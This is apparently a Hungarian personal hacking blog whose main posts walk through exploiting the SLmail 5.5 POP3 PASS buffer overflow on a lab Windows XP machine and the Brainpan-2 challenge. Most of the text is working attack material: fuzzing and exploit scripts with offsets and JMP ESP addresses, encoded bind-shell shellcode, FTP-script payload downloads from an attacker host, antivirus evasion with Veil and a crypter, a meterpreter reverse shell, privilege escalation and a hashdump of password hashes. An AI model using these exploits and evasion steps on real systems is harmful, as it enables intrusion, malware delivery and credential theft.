2014. március 16., vasárnap

irisscon 2012 CTF challenges

A hét végén ezzel szórakoztam:

http://damienoreilly.org/ctf/index.php

Ennyire futotta egyelőre:











A Wechallon feljöttem a 11 helyre :)






Elkezdtem reverse engineeringgel foglalatoskodni és már a szimpla feladványokat meg tudom oldani ezzel a kevéske tudással :)


A HackTisSite.org-on vannak nagyon jó kis feladványok :






Meg a ThisIs Legal.com-on is lejutottan egy darabig:


Egyenlőre ennyi.

2014. január 23., csütörtök

SLmail exploit


1st step download this : http://www.offensive-security.com/pwbonline/extrabos.tar.gz
2nd step : install the slmail application to XP machine

netstat -naob

 Protokoll  Helyi cím              Idegen cím             Állapot           PID
  TCP    0.0.0.0:25             0.0.0.0:0              FIGYEL          1944
  [slsmtp.exe]

  TCP    0.0.0.0:79             0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:106            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:110            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

...

  TCP    0.0.0.0:180            0.0.0.0:0              FIGYEL          1840
  [SLadmin.exe]
...
  TCP    127.0.0.1:8376         0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]
...
  UDP    0.0.0.0:50             *:*                                    2376
  [SLmail.exe]

  UDP    0.0.0.0:54             *:*                                    2376
  [SLmail.exe]
...

root@kali:~# unicornscan -mT 192.168.56.105
TCP open                smtp[   25]        from 192.168.56.105  ttl 128
TCP open              finger[   79]        from 192.168.56.105  ttl 128
TCP open          3com-tsmux[  106]        from 192.168.56.105  ttl 128
TCP open                pop3[  110]        from 192.168.56.105  ttl 128
TCP open               epmap[  135]        from 192.168.56.105  ttl 128
TCP open         netbios-ssn[  139]        from 192.168.56.105  ttl 128
TCP open        microsoft-ds[  445]        from 192.168.56.105  ttl 128
TCP open             unknown[ 8081]        from 192.168.56.105  ttl 128

root@kali:~# nmap -sV -A 192.168.56.105 -pT:25,79,106,110,180

25/tcp  open  smtp    SLmail smtpd 5.5.0.4433
| smtp-commands: xxxxx-30298B2AD.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN,
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp  open  finger  SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp open  pop3pw  SLMail pop3pw
110/tcp open  pop3    BVRP Software SLMAIL pop3d
180/tcp open  ris?

root@kali:~# nc 192.168.56.105 25
220 xxxxx-30298B2AD.com SMTP Server SLmail 5.5.0.4433 Ready ESMTP spoken here
HELO my
250 xxxxx-30298B2AD.com
HELP
214-This server supports the following commands.
214-HELO    MAIL    RCPT    DATA    RSET
214-SEND    SOML    SAML    HELP    NOOP
214 QUIT
QUIT
221 xxxxx-30298B2AD.com Service closing transmission channel

root@kali:~# nc 192.168.56.105 79
?
Unable to find specified user.

root@kali:~# nc 192.168.56.105 106
200 hello
help
500 protocol error
?
500 protocol error
quit
200 bye

root@kali:~# nc 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00005.988109@xxxxx-30298B2AD.com>
HELP
-ERR unknown command
?
-ERR unknown command
QUIT
+OK POP3 server xxxxx-30298B2AD.com signing off.

root@kali:~# nc 192.168.56.105 180
?
HELP
QUIT
^C

http://www.exploit-db.com/exploits/638/

root@kali:~# searchsploit slmail
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
SLMail 5.5 POP3 PASS Buffer Overflow Exploit                                /windows/remote/638.py
SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit                       /windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit                                 /windows/remote/646.c

root@kali:~# cat slmail_buf.py
import sys
import struct
import socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A'*2000
s.connect((sys.argv[1],int(sys.argv[2])))
data=s.recv(1024)
print data
s.send('USER user\r\n')
data=s.recv(1024)
print data
s.send('PASS '+buffer+'\r\n')
data=s.recv(1024)
print data
s.close()

ollydbg Attach SLMAIL.exe
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00006.1554953@xxxxx-30298B2AD.com>

+OK user welcome here

-ERR unable to lock mailbox

buffer = 'A'*5000

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00007.1647656@xxxxx-30298B2AD.com>

+OK user welcome here

^CTraceback (most recent call last):
  File "slmail_buf.py", line 16, in <module>
    data=s.recv(1024)
KeyboardInterrupt

ESP 01BFA154 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
EIP 41414141

root@kali:~# /usr/share/metasploit-framework/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A...

buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...

root@kali:~# python slmail_buf.py 192.168.56.105 110

ESP 01BFA154 ASCII "2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh
EBP 46307A46
EIP 7A46317A

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 7A46317A
[*] Exact match at offset 4654

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 2Fz3
[*] Exact match at offset 4658

ollydbg Search JMP ESP

7C91FCD8   FFE4             JMP ESP

root@kali:~# msfpayload  windows/shell_bind_tcp RPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t python
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

buf =  ""
buf += "\xdb\xd2\xb8\xb3\xb6\xb4\xe1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x03\x47\x18\x83\xc7\xb7\x54"
buf += "\x41\x1d\x5f\x11\xaa\xde\x9f\x42\x22\x3b\xae\x50\x50"
...
buffer = '\x41' * 4654 + '\xD8\xFC\x91\x7C' + '\x90'*32 + buf

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00001.6738453@xxxxx-30298B2AD.com>

+OK user welcome here

root@kali:~# nc 192.168.56.105 4444
Microsoft Windows XP [verzi&#65533;sz&#65533;m: 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmailSystem>

Next Step : Bypass the AV & privilege escalation.

C:\Program Files\SLmail\System>tftp -i 192.168.56.101 GET nc.exe
tftp -i 192.168.56.101 GET nc.exe
A hozz�f�r�s megtagadva.

AV log:

2014.01.24.    09:46:38    Blocked by Access Protection rule     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\cmd.exe    C:\WINDOWS\system32\tftp.exe    Anti-virus Standard Protection:Prevent use of tftp.exe    Action blocked : Read

C:\Program Files\SLmail\System>echo open 192.168.56.101 21> ftp.txt
echo open 192.168.56.101 21> ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET nc.exe>>ftp.txt
echo GET nc.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhaszn�l� (192.168.56.101:(none)): open 192.168.56.101 21

bin
GET nc.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajt�ban (C) l�v� k�tet xp_system.
 A k�tet sorozatsz�ma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  09:48    <DIR>          .
2014.01.24.  09:48    <DIR>          ..
2014.01.24.  09:47                56 ftp.txt
2002.11.19.  11:40             3�358 listrcrd.txt
2014.01.23.  09:24             1�898 maillog.000
2014.01.24.  00:00            51�104 maillog.001
2014.01.24.  09:33             6�141 maillog.txt
               5 f�jl            62�557 b�jt
               2 k�nyvt�r  30�726�782�976 b�jt szabad

C:\Program Files\SLmail\System>

AV log:

2014.01.24.    9:48:12    Deleted     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\ftp.exe    C:\Program Files\SLmail\System\nc.exe    Tool-NetCat (Potentially Unwanted Program)

Generate a payload16.exe with Veil.

C:\Program Files\SLmail\System>echo open 192.168.56.101 21>ftp.txt
echo open 192.168.56.101 21>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET payload16.exe>>ftp.txt
echo GET payload16.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhaszn�l� (192.168.56.101:(none)): open 192.168.56.101 21


bin
GET payload16.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajt�ban (C) l�v� k�tet xp_system.
 A k�tet sorozatsz�ma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  10:27    <DIR>          .
2014.01.24.  10:27    <DIR>          ..
2014.01.24.  10:27                63 ftp.txt
2002.11.19.  11:40             3�358 listrcrd.txt
2014.01.23.  09:24             1�898 maillog.000
2014.01.24.  00:00            51�104 maillog.001
2014.01.24.  10:03             6�309 maillog.txt
2014.01.24.  10:27         3�059�256 payload16.exe
               6 f�jl         3�121�988 b�jt
               2 k�nyvt�r  30�723�756�032 b�jt szabad

C:\Program Files\SLmail\System>

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.101:443
[*] Starting the payload handler...

C:\Program Files\SLmail\System>payload16.exe
payload16.exe

msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:443 -> 192.168.56.105:3089) at 2014-01-24 10:56:18 +0100

sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ xxxxx-30298B2AD  192.168.56.101:443 -> 192.168.56.105:3089 (192.168.56.105)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : xxxxx-30298B2AD
OS              : Windows XP (Build 2600, Szervizcsomag 3).
Architecture    : x86
System Language : hu_HU
Meterpreter     : x86/win32
meterpreter >

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session     User                                                                                                      Path
 ---   ----  ----                  ----  -------     ----                                                                                                      ----
 0     0     [System Process]            4294967295                                                                                                           
 4     0     System                x86   0           NT AUTHORITY\SYSTEM                                                                                      
 188   2012  explorer.exe          x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\WINDOWS\Explorer.EXE
 300   1600  cmd.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\WINDOWS\system32\cmd.exe
...

 532   848   FrameworkService.exe  x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\Common Framework\FrameworkService.exe
 580   848   VsTskMgr.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
 644   2476  McTray.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\Common Framework\McTray.exe
 712   644   shstat.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\VirusScan Enterprise\SHSTAT.EXE
 744   848   mdm.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
 752   580   mfeann.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\mfeann.exe
...
                                                                           C:\WINDOWS\system32\mfevtps.exe
 976   3676  payload16.exe         x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\payload16.exe
...

 1840  848   SLadmin.exe           x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLadmin\SLadmin.exe
 1944  848   SLSmtp.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\slsmtp.exe
...

 2100  300   nc.exe                x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\nc.exe
 2136  848   mcshield.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe

meterpreter >

I encrypted the nc.exe too.... :

root@kali:~/Hyperion-1.0# wine crypter.exe nc.exe nc_crypt.exe

Opening nc.exe
Copied file to memory: 0x117358
Found valid MZ signature
Found pointer to PE Header: 0xd8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

...

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm nc_crypt.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

The AV bypassed...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Admin:1022:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
ASPNET:1004:275b6f5ffbf7997723474a13bebfa08d:738da873863e137c2e75504e6a8b4ca5:::
Rendszergazda:1005:aad3b435b51404eeaad3b435b51404ee:6f3961367d2b4d1f55f14af59f34cd45:::
Seg�ts�gny�jt�:1021:b3c85a07a2fc61530574f646d69db64a:2e82f56f50cfaa7347b018126bcad628:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bf0859717440c82b18e3f5cb36db8211:::
user:1023:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Vend�g:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

Game OVER.

2014. január 17., péntek

Brainpan - 2

root@kali:~# netdiscover

192.168.56.104

root@kali:~# unicornscan -mT 192.168.56.104

TCP open                ndmp[10000]

root@kali:~# nmap -sS -A 192.168.56.104 -pT:10000

10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)

root@kali:~# nmap -sT 192.168.56.104 -pT:1-65535

9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

root@kali:~# nmap -sS -A 192.168.56.104 -pT:9999

SF-Port9999-TCP:V=6.40%I=7%D=1/16%Time=52D7DAB2%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");

root@kali:~# nc 192.168.56.104 9999

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

http://192.168.56.104:10000/

root@kali:~# nikto -host 192.168.56.104 -port 10000
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        10000
+ Start Time:         2014-01-16 14:21:40 (GMT1)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ 6544 items checked: 25 error(s) and 4 item(s) reported on remote host
+ End Time:           2014-01-16 14:21:52 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

http://192.168.56.104:10000/bin/

brainpan.exe (downloaded)

root@kali:~# hd brainpan.exe | more

4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|

This is a Windows executable.

root@kali:~# wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

root@kali:~# netstat -nl | grep 9999

tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN

root@kali:~# nc 127.0.0.1 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

root@kali:~# strings brainpan.exe
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|
[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             
                          >>
                          ACCESS DENIED
                          ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter
__getmainargs
__p__environ
__p__fmode
__set_app_type
_assert
_cexit
_iob
_onexit
_setmode
abort
atexit
free
malloc
memset
printf
signal
strcmp
strcpy
strlen
WSACleanup
WSAGetLastError
WSAStartup
accept
bind
closesocket
htons
listen
recv
send
socket
KERNEL32.dll
msvcrt.dll
WS2_32.DLL

root@kali:~# nc 127.0.0.1 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED

root@kali:~# nc 192.168.56.104 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED

The password is shitstorm.

This is maybe a buffer owerflow challenge....

I send a BIG string to password...

[get_reply] s =

[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(■B]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x61616161 at address 0x61616161 (thread 0009), starting debugger...
Unhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:61616161 ESP:0042f810 EBP:61616161 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  61616161 61616161 61616161 61616161
0x0042f820:  61616161 61616161 61616161 61616161
0x0042f830:  61616161 61616161 61616161 61616161
0x0042f840:  61616161 61616161 61616161 61616161
0x0042f850:  61616161 61616161 61616161 61616161
0x0042f860:  61616161 61616161 61616161 61616161

Hexa 61 = 'a'

root@kali:~# hexeditor overflow.txt

root@kali:~# nc 127.0.0.1 9999 < overflow.txt

...
bbbbabcdabcdefghijklmnopqrstuvwxyz{|}~

[get_reply] copied 540 bytes to buffer

 EIP:69686766 ESP:0042f810 EBP:65646362 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  6d6c6b6a 71706f6e 0a747372 00000000
0x0042f820:  00000000 00000000 00000000 00000000

EIP : 69686766 (ihgf) EBP: 65646362 (edcb)

Stack: mlkj qpon utsr yxwv
       }|{z

EIP -> ESP, 69686766 (ihgf) -> 0042f810 

It Doesn't work because the 00 byte.

root@kali:~# wine OLLYDBG.EXE ../brainpan.exe

Search JMP ESP -> 0x311712f3

root@kali:~# hexeditor overflow.txt

[get_reply] copied 550 bytes to buffer
wine: Unhandled page fault on read access to 0xffffffff at address 0x42f88d (thread 002d), starting debugger...
Unhandled exception: page fault on read access to 0xffffffff in 32-bit code (0x0042f88d).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:0042f88d ESP:0042f810 EBP:65646362 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  90909090 71909090 75747372 79787776
0x0042f820:  7d7c7b7a 00000a7e 00000000 00000000
0x0042f830:  00000000 00000000 00000000 00000010
0x0042f840:  00000000 00000000 00000000 00000000
0x0042f850:  5da40002 0100007f 00000000 00000000
0x0042f860:  0f270002 00000000 00000000 00000000

root@kali:~# pico buf_ov.pl

#!/usr/bin/perl
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}


$baddata = "A" x 524; #  524 "A" characters to $baddata
$baddata .= pack('V', 0x311712F3); #  JMP ESP
$baddata .= "C" x (3000 - length($baddata)); # extends $baddata with "C"

$socket = IO::Socket::INET->new( # setup TCP socket – $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 – IP Address
PeerPort => "$ARGV[1]" # command line variable 2 – TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";

$socket->recv($sd, 1024); # Receive 1024 bytes data from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket

root@kali:~# perl buf_ov.pl 127.0.0.1 9999

[get_reply] copied 1003 bytes to buffer
